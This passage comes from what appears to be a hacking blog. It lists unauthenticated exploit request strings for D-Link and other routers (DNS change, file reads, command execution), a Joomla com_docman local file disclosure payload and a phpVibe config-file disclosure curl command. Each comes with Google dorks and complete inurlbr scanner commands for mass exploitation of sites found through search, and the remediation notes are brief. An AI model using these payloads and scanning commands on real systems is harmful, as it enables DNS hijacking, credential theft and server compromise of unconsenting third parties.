<span style="font-family: Courier New, Courier, monospace;"> Usage: <b><span style="color: red;">--sub-get</span></b></span></div>
</div>
<div>
<br /></div>
<div>
<b style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;">SET </b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>VALIDATION HTTP CODE:</b></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> --ifcode Valid results based on your return http code.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Example: <b>--ifcode</b> {ifcode}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>--ifcode</b> 200</span></span></div>
</div>
<div>
<br /></div>
<div>
<b style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;">SET TIME-OUT</b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>:</b></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> --time-out Timeout to exit the process.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Example: <b>--time-out</b> {second}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>--time-out</b> 3</span></span></div>
</div>
<div>
<br /></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">COMPLETE COMMAND:</span></b></div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;">php inurlbr.php <b>--range</b> '172.1.0.1,172.1.0.163' <b>-s</b> vuln.txt <b>--sub-file</b> 'string_exploits.txt' <b>--sub-get</b> <b>--ifcode</b> 200</span></div>
<div>
<br /></div>
<div>
print output:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEkiDmGQuGQtH7lQ6ke-bDkIzYvvYD9xC99S66jMA_5faqQQtF7f4r6aUH2d1VthexW-d70hp5Z3blAkssqL1AJuAKGRUEdmFSK6Kb1UO6D7IbNhi-wuc9m1yGiit7rlh95MoYhObuSaR-/s1600/Captura+de+tela+de+2015-07-20+04%253A19%253A25.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="COMPLETE COMMAND: php inurlbr.php --range '172.1.0.1,172.1.0.163' -s vuln.txt --sub-file 'string_exploits.txt' --sub-get --ifcode 200 print output:" border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEkiDmGQuGQtH7lQ6ke-bDkIzYvvYD9xC99S66jMA_5faqQQtF7f4r6aUH2d1VthexW-d70hp5Z3blAkssqL1AJuAKGRUEdmFSK6Kb1UO6D7IbNhi-wuc9m1yGiit7rlh95MoYhObuSaR-/s640/Captura+de+tela+de+2015-07-20+04%253A19%253A25.png" title="COMPLETE COMMAND: php inurlbr.php --range '172.1.0.1,172.1.0.163' -s vuln.txt --sub-file 'string_exploits.txt' --sub-get --ifcode 200 print output:" width="640" /></a></div>
<div>
<br /></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Strings exploits used:</b></span></div>
<div>
<a href="https://www.exploit-db.com/search/?order_by=date&order=desc&pg=1&action=search&description=d-link" target="_blank">https://www.exploit-db.com/search/?order_by=date&order=desc&pg=1&action=search&description=d-link</a></div>
<div>
<br /></div>
<blockquote class="tr_bq" style="text-align: center;">
<span style="font-size: large;">All exploits cited already have packages fix.</span></blockquote>
<div>
<br /></div>
<b>Exploit_model:</b> <b>Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change</b><br />
<b>STRING GET:</b><span style="font-family: Courier New, Courier, monospace;"> /dnscfg.cgi?dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1</span><br />
<a href="http://www.exploit-db.com/exploits/35995/" target="_blank">http://www.exploit-db.com/exploits/35995/</a><br />
<br />
<b>Exploit_model:</b> <b>D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit</b><br />
<b>STRING GET:</b><span style="font-family: Courier New, Courier, monospace;"> /dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8</span><br />
<a href="http://www.exploit-db.com/exploits/35917/" target="_blank">http://www.exploit-db.com/exploits/35917/</a><br />
<br />
<b>Exploit_model:</b> <b>D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit</b><br />
<b>STRING GET: </b><span style="font-family: Courier New, Courier, monospace;">/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP</span><br />
<a href="http://1337day.com/exploit/23302/" target="_blank">http://1337day.com/exploit/23302/</a><br />
<br />
<b>Exploit_model: LG DVR LE6016D / Unauthenticated users/passwords disclosure exploitit</b><br />
<b>STRING GET:</b> <span style="font-family: Courier New, Courier, monospace;">/dvr/wwwroot/user.cgi</span><br />
<a href="http://www.exploit-db.com/exploits/36014/" target="_blank">http://www.exploit-db.com/exploits/36014/</a><br />
<br />
<b>Exploit_model: D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities</b><br />
<b>STRING GET:</b><span style="font-family: Courier New, Courier, monospace;"> /web_cgi.cgi?&request=UploadFile&path=/etc/</span><br />
<a href="https://www.exploit-db.com/exploits/37454/" target="_blank">https://www.exploit-db.com/exploits/37454/</a><br />
<br />
<b>Exploit_model:</b> <b>D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change</b><br />
<b>STRING GET:</b><span style="font-family: Courier New, Courier, monospace;"> /dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1</span><br />
<a href="https://www.exploit-db.com/exploits/37237/" target="_blank">https://www.exploit-db.com/exploits/37237/</a><br />
<br />
<b>Exploit_model:</b> <b>D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change</b><br />
<b>STRING GET:</b><span style="font-family: Courier New, Courier, monospace;"> /dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=</span><br />
<a href="https://www.exploit-db.com/exploits/37240/" target="_blank">https://www.exploit-db.com/exploits/37240/</a><br />
<br />
<b>Exploit_model:</b> <b>D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change</b><br />
<b>STRING GET: </b><span style="font-family: Courier New, Courier, monospace;">/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1</span><br />
<a href="https://www.exploit-db.com/exploits/37241" target="_blank">https://www.exploit-db.com/exploits/37241</a>/<br />
<br />
<b>Exploit_model: D-Link DSL-2640B - Unauthenticated Remote DNS Change Exploit</b><br />
<b>STRING GET:</b><span style="font-family: Courier New, Courier, monospace;"> /ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP</span><br />
<a href="https://www.exploit-db.com/exploits/36105/" target="_blank">https://www.exploit-db.com/exploits/36105/</a><br />
<br />
<b>Exploit_model:</b> <b>D-Link DSL-2740R - Unauthenticated Remote DNS Change Exploit</b><br />
<b>STRING GET:</b> <span style="font-family: Courier New, Courier, monospace;">/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8</span><br />
<a href="https://www.exploit-db.com/exploits/35917/" target="_blank">https://www.exploit-db.com/exploits/35917/</a><br />
<br />
<b>Exploit_model:</b> <b>D-Link AP 3200 - Multiple Vulnerabilities</b><br />
<b>STRING GET: </b><span style="font-family: Courier New, Courier, monospace;">/html/tUserAccountControl.htm</span><br />
<a href="https://www.exploit-db.com/exploits/34206/" target="_blank">https://www.exploit-db.com/exploits/34206/</a><br />
<br />
<b>Exploit_model: D-Link info.cgi POST Request Buffer Overflow</b><br />
<b>STRING GET: </b><span style="font-family: Courier New, Courier, monospace;">/common/info.cgi</span><br />
<a href="https://www.exploit-db.com/exploits/34063/" target="_blank">https://www.exploit-db.com/exploits/34063/</a><br />
<br />
<b>Exploit_model:</b> <b>D-Link hedwig.cgi Buffer Overflow in Cookie Header</b><br />
<b>STRING GET: </b><span style="font-family: Courier New, Courier, monospace;">/hedwig.cgi</span><br />
<a href="https://www.exploit-db.com/exploits/33863/" target="_blank">https://www.exploit-db.com/exploits/33863/</a><br />
<br />
<b>Exploit_model:</b> <b>DGL-5500, DIR-855L and the DIR-835:</b><br />
<b>STRING GET:</b> <span style="font-family: Courier New, Courier, monospace;">/tools_admin.asp</span><br />
<a href="https://www.exploit-db.com/exploits/33520/" target="_blank">https://www.exploit-db.com/exploits/33520/</a><br />
<br />
<b>Exploit_model:</b> <b>D-Link models DGL-5500, DIR-855L, DIR-835 suffer</b><br />
<b>STRING GET:</b> <span style="font-family: Courier New, Courier, monospace;">/hnap.cgi</span><br />
<a href="https://www.exploit-db.com/exploits/33520/" target="_blank">https://www.exploit-db.com/exploits/33520/</a><br />
<br />
<b>Exploit_model:</b> <b>D-Link DSL-2750B ADSL Router - CSRF Vulnerability</b><br />
<b>STRING GET: </b><span style="font-family: Courier New, Courier, monospace;">/scdmz.cmd?&fwFlag=50853375&dosenbl=1</span><br />
<a href="https://www.exploit-db.com/exploits/31569/" target="_blank">https://www.exploit-db.com/exploits/31569/</a><br />
<br />
<b>Exploit_model: D-Link DIR-100 - Multiple Vulnerabilities</b><br />
<b>STRING GET</b>:<span style="font-family: Courier New, Courier, monospace;"> /cliget.cgi?cmd=help</span><br />
<a href="https://www.exploit-db.com/exploits/31425/" target="_blank">https://www.exploit-db.com/exploits/31425/</a><br />
<br />
<b>Exploit_model: D-Link DSR Router Series - Remote Root Shell Exploit</b><br />
<b>STRING GET:</b> <span style="font-family: Courier New, Courier, monospace;">/scgi-bin/platform.cgi</span><br />
<a href="https://www.exploit-db.com/exploits/30062/" target="_blank">https://www.exploit-db.com/exploits/30062/</a><br />
<br />
<b>Exploit_model:</b> <b>D-Link Devices UPnP SOAP Telnetd Command Execution</b><br />
<b>STRING GET:</b> <span style="font-family: Courier New, Courier, monospace;">/soap.cgi</span><br />
<a href="https://www.exploit-db.com/exploits/28333/" target="_blank">https://www.exploit-db.com/exploits/28333/</a><br />
<br />
<b>Exploit_model: D-Link DIR-505 1.06 - Multiple Vulnerabilities</b><br />
<b>STRING GET: </b><span style="font-family: Courier New, Courier, monospace;">/dws/api/ListFile?id=admin&tok=&volid=1&path=usb_dev/usb_A1/../../../../etc</span><br />
<a href="https://www.exploit-db.com/exploits/28184/" target="_blank">https://www.exploit-db.com/exploits/28184/</a><br />
<br />
<b>Exploit_model: D-Link Devices Unauthenticated Remote Command Execution</b><br />
<b>STRING GET: </b><span style="font-family: Courier New, Courier, monospace;">/command.php</span><br />
<a href="https://www.exploit-db.com/exploits/27528/" target="_blank">https://www.exploit-db.com/exploits/27528/</a><br />
<br />
<b>Exploit_model:</b> <b>D-Link DIR-645 1.03B08 - Multiple Vulnerabilities</b><br />
<b>STRING GET:</b><span style="font-family: Courier New, Courier, monospace;"> /authentication.cgi</span><br />
<a href="https://www.exploit-db.com/exploits/27283/" target="_blank">https://www.exploit-db.com/exploits/27283/</a><br />
<div>
<br /></div>
InurlBRhttp://www.blogger.com/profile/12688503833321390298noreply@blogger.com5tag:blogger.com,1999:blog-5670232360751087799.post-16218856524057076972015-07-15T17:17:00.002-03:002015-07-15T17:40:07.161-03:00Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)<h4 style="clear: both; text-align: center;">
<span style="font-size: large;">Exploring component of Joomla cms</span></h4>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiddZ_0SDy1phB7Y3MX73KkELYr21BHc9ciHYVPCCp6mcuKgvOLA7_rkS-ahRfODYQ5tvv9K5aFTZ4Ai9l9jgPkXbe8vWGsNDchDrt0felXgzTod67qoP7p6LyzXte7FCdhuUtvyHeXHBB4/s1600/joomla-sql-injection.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI) # CWE: CWE-200(FPD) CWE-98(LFI/LFD) # Risk: High # Author: Hugo Santiago dos Santos # Contact: hugo.s@linuxmail.org # Date: 13/07/2015 # Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman https://www.exploit-db.com/exploits/37620/" border="0" height="265" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiddZ_0SDy1phB7Y3MX73KkELYr21BHc9ciHYVPCCp6mcuKgvOLA7_rkS-ahRfODYQ5tvv9K5aFTZ4Ai9l9jgPkXbe8vWGsNDchDrt0felXgzTod67qoP7p6LyzXte7FCdhuUtvyHeXHBB4/s400/joomla-sql-injection.jpg" title="# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI) # CWE: CWE-200(FPD) CWE-98(LFI/LFD) # Risk: High # Author: Hugo Santiago dos Santos # Contact: hugo.s@linuxmail.org # Date: 13/07/2015 # Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman https://www.exploit-db.com/exploits/37620/" width="400" /></a></div>
<br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"># <a href="http://blog.inurl.com.br/search/label/joomla" target="_blank">Joomla</a> docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(<a href="http://blog.inurl.com.br/search/label/lfd" target="_blank">LFD</a>/<a href="http://blog.inurl.com.br/search/label/lfi" target="_blank">LFI</a>)</span><br />
<span style="font-family: Courier New, Courier, monospace;"># CWE: CWE-200(FPD) CWE-98(<a href="http://blog.inurl.com.br/search/label/lfi" target="_blank">LFI</a>/<a href="http://blog.inurl.com.br/search/label/lfd" target="_blank">LFD</a>)</span><br />
<span style="font-family: Courier New, Courier, monospace;"># Risk: <b>High</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"># Author: Hugo Santiago dos Santos</span><br />
<span style="font-family: Courier New, Courier, monospace;"># Contact: hugo.s@linuxmail.org</span><br />
<span style="font-family: Courier New, Courier, monospace;"># Date: 13/07/2015</span><br />
<span style="font-family: Courier New, Courier, monospace;"># Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman</span><br />
<a href="https://www.exploit-db.com/exploits/37620/" target="_blank">https://www.exploit-db.com/exploits/37620/</a><br />
<br />
There is a get parameter untreated in the application "<b>file=</b>" which enables download files from the server.<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Google Dork:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">inurl:"/components/com_docman/dl2.php"</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>POC:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">http://www.site.com/components/com_docman/dl2.php?archive=0&file=<b>base64([LDF])</b></span><br />
<br />
Internment such an application must use the native function of php <b>base64_decode</b> to access your files.<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">string base64_decode ( string $data [, bool $strict = false ] );</span><br />
more <a href="http://php.net/manual/en/function.base64-decode.php">http://php.net/manual/en/function.base64-decode.php</a><br />
<br />
The application uses crypt 64 then we should do the same to get the server files.<br />
<br />
<b>injection string:</b><br />
<span style="font-family: Courier New, Courier, monospace;">../../../../../../../target/www/configuration.php</span> <b><= Not Ready</b><br />
<b><br />encoded string:</b><br />
<span style="font-family: Courier New, Courier, monospace;">Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==</span> <= <b>Ready !</b><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Example</span></b><br />
<span style="font-family: Courier New, Courier, monospace;">http://www.site.com/components/com_docman/dl2.php?archive=0&file=<b>Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==</b></span> <= Ready !<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">Using <a href="http://blog.inurl.com.br/search/label/INURLBR" target="_blank">inurlbr</a> scanner for mass exploitation:</span><br />
Download script: <a href="https://github.com/googleinurl/SCANNER-INURLBR">https://github.com/googleinurl/SCANNER-INURLBR</a><br />
<b>- Creating our command</b><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET DORK:</span></b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">--dork 'inurl:"/components/com_docman/dl2.php"'</span><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET OUTPUT FILE:</span></b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"> -s dl2.txt </span><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET EXPLOIT GET</span></b><br />
To encode our injection string we use a ineterna function of inurlbr script.<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">base64</span></b> Encrypt values in base64.<br />
Example: <span style="color: red; font-family: Courier New, Courier, monospace;"><b>base64(</b>{value}<b>)</b></span><br />
Usage: <span style="color: red; font-family: Courier New, Courier, monospace;"><b>base64(</b>102030<b>)</b></span><br />
Usage: <br />
<span style="font-family: Courier New, Courier, monospace;"><i>--exploit-get 'user?id=</i><b><span style="color: red;">base64(</span></b>102030<span style="color: red;"><b>)</b></span><i>'</i></span><br />
<span style="font-family: Courier New, Courier, monospace;"> </span><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>URL with inject get</b>:</span><br />
<span style="font-family: 'Courier New', Courier, monospace;"> http://www.target.us/</span><span style="font-family: 'Courier New', Courier, monospace;">user?id=</span><span style="color: red; font-family: Courier New, Courier, monospace;"><b>MTAyMDMw</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">Use:</span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>--exploit-get</b> '/dl2.php?archive=0&file=<b>base64(</b></span><span style="font-family: 'Courier New', Courier, monospace;"><span style="color: red;">../../../../../../../target/www/configuration.php</span><b>)</b></span><span style="color: red; font-family: 'Courier New', Courier, monospace;">'</span><br />
<br />
OR USE SITE ENCODER: <a href="https://www.base64encode.org/" target="_blank">https://www.base64encode.org/</a><br />
Use:<br />
<span style="color: red; font-family: Courier New, Courier, monospace;">--exploit-get '/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA=='</span><br />
<br />
<b>SET FILTER </b><br />
Filter results in unique domains.<br />
<span style="color: red; font-family: Courier New, Courier, monospace;">--unique</span><br />
<br />
<b>SET VALIDATION</b><br />
Valid results based on your return http code.<br />
Example: <span style="color: red; font-family: Courier New, Courier, monospace;">--ifcode {ifcode}</span><br />
Usage: <span style="color: red; font-family: Courier New, Courier, monospace;">--ifcode 200</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>COMPLETE COMMAND:</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">php inurlbr.php <b>--dork</b> 'inurl:"/components/com_docman/dl2.php"' <b>-s</b> dl2.txt <b>--exploit-get</b> '/dl2.php?archive=0&file=<i>base64(</i>../../../../../../../target/www/configuration.php<i>)</i>' <b>--unique</b> <b>--ifcode</b> 200</span><br />
<br />
OR<br />
<br />
<span style="color: red; font-family: 'Courier New', Courier, monospace;">php inurlbr.php </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">--dork</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"> 'inurl:"/components/com_docman/dl2.php"' </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">-s</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"> dl2.txt </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">--exploit-get</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"> '/dl2.php?archive=0&file=</span><span style="color: red; font-family: 'Courier New', Courier, monospace;">Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==</span><span style="color: red; font-family: 'Courier New', Courier, monospace;">'</span><span style="color: red; font-family: 'Courier New', Courier, monospace;"> </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">--unique</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"> </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">--ifcode</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"> 200</span><br />
<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Remediation:</b></span><br />
The most effective solution to eliminate file inclusion vulnerabilities is to avoid passing user-submitted input to any filesystem/framework API. If this is not possible the application can maintain a white list of files, that may be included by the page, and then use an identifier (for example the index number) to access to the selected file. Any request containing an invalid identifier has to be rejected, in this way there is no attack surface for malicious users to manipulate the path.<br />
<a href="https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion">https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion</a><br />
<a href="https://www.owasp.org/index.php/Full_Path_Disclosure">https://www.owasp.org/index.php/Full_Path_Disclosure</a>InurlBRhttp://www.blogger.com/profile/12688503833321390298noreply@blogger.com0tag:blogger.com,1999:blog-5670232360751087799.post-77782424251029563182015-07-13T22:43:00.000-03:002015-07-14T01:15:47.908-03:00phpVibe ALL versions LFD vulnerability Exploring with inurlbr<h4 style="text-align: center;">
<span style="font-size: large;">LFD exploiting vulnerability in phpvibe</span></h4>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQLeHAvCSTOE6DPT44ERljfim4XKbOamqF3q8hvLsY-bBhRD0qJfROL8G1uYkx5f7N_xuI6GuBHMElIHOMQOwlb6qF-aLTMCqJP68ICiG_ED3YyVgAlOI1pKkeLCLghj9uCr9m_Tm4h9eG/s1600/Captura+de+tela+de+2015-07-13+22%253A39%253A32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="PHPVibe - A php video script built for sharing video and media. PHPVibe video sharing cms: php video embed and video upload script, ffmpeg video conversion, Youtube,Vine" border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQLeHAvCSTOE6DPT44ERljfim4XKbOamqF3q8hvLsY-bBhRD0qJfROL8G1uYkx5f7N_xuI6GuBHMElIHOMQOwlb6qF-aLTMCqJP68ICiG_ED3YyVgAlOI1pKkeLCLghj9uCr9m_Tm4h9eG/s640/Captura+de+tela+de+2015-07-13+22%253A39%253A32.png" title="PHPVibe - A php video script built for sharing video and media. PHPVibe video sharing cms: php video embed and video upload script, ffmpeg video conversion, Youtube,Vine" width="640" /></a></div>
PHPVibe - A php video script built for sharing video and media. PHPVibe video sharing <a href="http://blog.inurl.com.br/search/label/cms" target="_blank">cms</a>: php video embed and video upload script, ffmpeg video conversion, Youtube,Vine<br />
<br />
# Exploit Title: phpVibe ALL versions LFD vulnerability<br />
<span style="font-size: large;"># Google Dork: "powered by phpvibe"</span><br />
# Date: 2015/07/13 (july 13th)<br />
# Exploit Author: ali ahmady -- Iranian Security Researcher (snip3r_ir[at]hotmail.com)<br />
# Vendor Homepage: http://www.phpvibe.com/<br />
# Software Link: http://get.phpvibe.com/<br />
# Version: All versions<br />
# Tested on: linux<br />
<a href="http://0day.today/exploit/23877">http://0day.today/exploit/23877</a><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Vulnerable file:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">stream.php</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>POC:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">http://</span><span style="font-family: 'Courier New', Courier, monospace;">target</span><span style="font-family: Courier New, Courier, monospace;">.tld/stream.php?file=<b>../vibe_config.php@@media</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">http://</span><span style="font-family: 'Courier New', Courier, monospace;">target</span><span style="font-family: Courier New, Courier, monospace;">.tld/stream.php?file=<b>TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09</b></span><br />
<br />
<b>Code:</b><br />
<span style="font-family: Courier New, Courier, monospace;">$token = <b>htmlspecialchars(base64_decode(base64_decode($_GET["file"])));</b></span><br />
<br />
File parameter has no validation and sanitization!<br />
exploition can be performed by adding "@@media" to the file name and base64 it two times as below (no registration needed).<br />
With simple request can get access to the database configuration file Mysql.<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">Example:</span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">curl 'http://TARGET/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09'</span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><br /></span>
OUTPUT PRINT:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU3S3xH1BZT0VRywIV7YBWuqtC8LDxOQUTiFlGsWAMY93gW3Io8aX5JAYA-D_hY4i94IcWv2k_hKrdbvJUuE24Lsh6MQYUGwhteoCx-JKzp5lR3yLz7h88EkGsdKLh-Sr7NPvhZbjizu8m/s1600/Captura+de+tela+de+2015-07-13+22%253A23%253A05.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt=" Example: curl 'http://TARGET/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09'" border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU3S3xH1BZT0VRywIV7YBWuqtC8LDxOQUTiFlGsWAMY93gW3Io8aX5JAYA-D_hY4i94IcWv2k_hKrdbvJUuE24Lsh6MQYUGwhteoCx-JKzp5lR3yLz7h88EkGsdKLh-Sr7NPvhZbjizu8m/s640/Captura+de+tela+de+2015-07-13+22%253A23%253A05.png" title=" Example: curl 'http://TARGET/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09'" width="640" /></a></div>
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span style="font-size: large;">Using </span><a href="http://blog.inurl.com.br/search/label/INURLBR" style="font-size: x-large;" target="_blank">inurlbr</a><span style="font-size: large;"> scanner for mass exploitation:</span><br /> Download script: <a href="https://github.com/googleinurl/SCANNER-INURLBR" target="_blank">https://github.com/googleinurl/SCANNER-INURLBR</a></span><br />
<b>- Creating our command</b><br />
<b><br /></b>
<b>SET DORK:</b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">--dork '"powered by phpvibe"'</span><br />
<br />
<b>SET OUTPUT FILE:</b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"> -s telefone.txt </span><br />
<br />
<b>SET EXPLOIT GET</b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">--exploit-get '/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09'</span><br />
<br />
<b>SET FILTER </b><br />
Filter results in unique domains.<br />
<span style="color: red; font-family: Courier New, Courier, monospace;">--unique </span><br />
<br />
<div>
<b>SET VALIDATION</b></div>
<div>
Valid results based on your return http code. </div>
Example: <span style="color: red; font-family: Courier New, Courier, monospace;">--ifcode {ifcode}</span><br />
Usage: <span style="color: red; font-family: Courier New, Courier, monospace;">--ifcode 200</span><br />
<div>
<br /></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>COMPLETE COMMAND:</b></span></div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;">php inurlbr.php <b>--dork</b> '"powered by phpvibe"' <b>-s</b> telefone.txt <b>--exploit-get</b> '/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09' <b>--unique</b> <b>--ifcode</b> 200</span></div>
<div>
<br /></div>
<div>
OUTPUT PRINT:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH_03_IF97LD94s8-ymfBIEWnRQnTcbztjb0ISaGCccmzfNmLLNKNjTZnv7XUef_Qor5ErNwu8YfVxk-mpr0bUehMJzyxOKWWYQ2EsOtEyhN7GIrP6pH8rmDEFCExHXK-F6eh4qTpwbJso/s1600/Captura+de+tela+de+2015-07-13+22%253A35%253A40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH_03_IF97LD94s8-ymfBIEWnRQnTcbztjb0ISaGCccmzfNmLLNKNjTZnv7XUef_Qor5ErNwu8YfVxk-mpr0bUehMJzyxOKWWYQ2EsOtEyhN7GIrP6pH8rmDEFCExHXK-F6eh4qTpwbJso/s640/Captura+de+tela+de+2015-07-13+22%253A35%253A40.png" width="640" /></a></div>
<div>
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Solution:</b></span><br />
<span style="font-size: large;">Improving validation of parameters passed to the application.</span></div>
